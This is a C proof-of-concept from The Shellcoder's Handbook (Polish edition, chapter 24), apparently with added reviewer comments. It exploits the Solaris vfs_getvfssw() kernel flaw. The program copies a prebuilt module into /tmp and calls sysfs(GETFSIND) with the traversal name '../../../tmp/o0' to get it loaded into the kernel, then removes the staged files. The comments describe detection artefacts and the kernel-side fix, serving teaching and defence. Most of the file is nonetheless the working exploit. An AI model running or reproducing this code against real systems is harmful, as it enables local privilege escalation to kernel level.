/*

The Shellcoder's Handbook. Edycja polska
Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
Sinan Eren, Neel Mehta, Riley Hassell
Wydawnictwo Helion


Rozdział 24
Wykorzystanie słabych punktów jądra
Eksploit funkcji vfs_getvfssw() w systemie Solaris

Komentarze i uwagi proszę przesyłać na adres jack@infosecinstitute.com
lub za pośrednictwem witryny http://www.infosecinstitute.com

*/



------------ o0o0.c ----------
#include <stdio.h>
#include <sys/fstyp.h>
#include <sys/fsid.h>
#include <sys/systeminfo.h>

/*int sysfs(int opcode, const char *fsname); */

/*
 * Proof-of-concept driver for the vfs_getvfssw() issue named in the file
 * header (Solaris).  Visible behaviour, in order:
 *   1. query the instruction-set list and the OS release with sysinfo();
 *   2. copy a prebuilt file from ./<release suffix>/ to a fixed path in /tmp;
 *   3. call sysfs(GETFSIND, ...) with a name that contains "../";
 *   4. delete the staged file or directory again.
 *
 * argc and argv are unused.  Every error path calls exit(0) and main has no
 * return statement, so the exit status does not distinguish failure from
 * success.
 *
 * NOTE(review): the kernel side is not shown in this listing.  Presumably the
 * file-system name is turned into a module path without rejecting path
 * separators, which is what would let a name containing "../" refer to a
 * file under /tmp -- confirm against the chapter text.  The matching defence
 * is for the kernel to refuse file-system type names that contain '/'.
 *
 * NOTE(review): the includes listed above this function do not name
 * <string.h>, <stdlib.h> or <sys/stat.h>; unless those headers pull them in,
 * memset, strstr, exit, system and mkdir are used without prototypes.
 *
 * Artefacts a defender can look for, all taken from the literals below:
 * a sysfs(GETFSIND) call whose name argument contains "../", a file /tmp/o0,
 * a directory /tmp/sparcv9 created with mode 0755, and cp / rm commands run
 * through system().
 */
int
main(int argc, char **argv)
{
  /* Name passed to sysfs(): a relative path that climbs three directories
   * and ends at tmp/o0, not a plain file-system type identifier. */
  char modname[] = "../../../tmp/o0";
  /* Scratch buffer: first the ISA list, later the cp command line. */
  char buf[4096];
  /* ver receives the release string; ptr will point just past its first '.'. */
  char ver[32], *ptr;
  /* Set to 1 when the ISA list mentions "sparcv9". */
  int sixtyfour = 0;

    /* Zero the buffer and pass one byte less than its size, so the result
     * stays NUL-terminated as long as sysinfo() writes at most 4095 bytes. */
    memset((char *) buf, 0x00, 4096);
    if(sysinfo(SI_ISALIST, (char *) buf, 4095) < 0) {
        perror("sysinfo");
        exit(0);
     }

     /* A "sparcv9" entry in the ISA list selects the 64-bit staging path. */
     if(strstr(buf, "sparcv9"))
        sixtyfour = 1;
  
     /* Fetch the OS release string; the full 32-byte size is passed here. */
     memset((char *) ver, 0x00, 32);
     if(sysinfo(SI_RELEASE, (char *) ver, 32) < 0) {
        perror("sysinfo");
        exit(0);
     }
 
     /* Keep only what follows the first '.' (constructed sample: "5.8"
      * would leave "8"); that suffix names the local source directory. */
     ptr = (char *) strstr(ver, ".");
     if(!ptr) {
         fprintf(stderr, "can't grab release version!\n");
         exit(0);
     } 
     ptr++;
     
     /* Build the shell command that stages the prebuilt file.  The only
      * interpolated value is the release suffix reported by sysinfo(); the
      * source path is relative to the current working directory. */
     memset((char *) buf, 0x00, 4096);
     if(sixtyfour)
       /* 64-bit variant: ./<suffix>/o064 -> /tmp/sparcv9/o0 */
       snprintf(buf, sizeof(buf)-1, "cp ./%s/o064 /tmp/sparcv9/o0", ptr); 
     else
       /* 32-bit variant: ./<suffix>/o032 -> /tmp/o0 */
       snprintf(buf, sizeof(buf)-1, "cp ./%s/o032 /tmp/o0", ptr);

     /* The 64-bit destination directory has to exist before the copy.  An
      * already-existing /tmp/sparcv9 makes mkdir() fail and the program
      * stops here.
      * NOTE(review): these are fixed names in /tmp, so any other local user
      * can create them first. */
     if(sixtyfour) 
        if(mkdir("/tmp/sparcv9", 0755) < 0) {
            perror("mkdir");
            exit(0);
        }

    /* Run the cp command through the shell; its exit status is ignored, so
     * a failed copy is not detected. */
    system(buf);
 
    /* The trigger: GETFSIND is called with the traversal path as the
     * file-system name.  The return value is discarded, so the program
     * never checks whether the call succeeded. */
    sysfs(GETFSIND, modname);
        //perror("hoe!");

   /* Remove the staged file or directory.  Because the on-disk artefacts are
    * deleted straight away, detection has to rely on process and system-call
    * auditing rather than on finding the files afterwards. */
   if(sixtyfour)
        system("/usr/bin/rm -rf /tmp/sparcv9");
     else
        system("/usr/bin/rm -f /tmp/o0");

}
